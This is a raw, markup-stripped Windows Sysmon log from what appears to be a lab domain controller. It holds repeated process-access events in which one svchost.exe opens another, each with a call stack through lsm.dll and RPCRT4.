13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 